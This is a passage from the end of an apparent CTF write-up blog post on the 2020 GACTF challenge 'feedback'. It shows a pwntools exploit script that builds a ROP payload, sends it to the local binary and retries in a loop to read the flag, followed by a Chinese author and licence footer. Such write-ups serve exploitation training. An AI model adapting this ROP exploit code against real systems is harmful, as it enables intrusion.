   payload += p64(pop_rdi)
   payload = payload.ljust(0x100,'\x00')
   payload += rop

   sh.sendlineafter('>>',payload)
   sh.sendlineafter('length?','1')
   sleep(1)
   sh.send('flag\x00')

while True:
   try:
      global sh
      sh = process('./feedback',env={'LD_PRELOAD':'./libc-2.23.so'})
      exploit()
      sh.interactive()
   except:
      sh.close()
      print 'trying...'

本文作者： A1ex
本文链接： http://yoursite.com/2020/12/19/2020GACTF/
版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！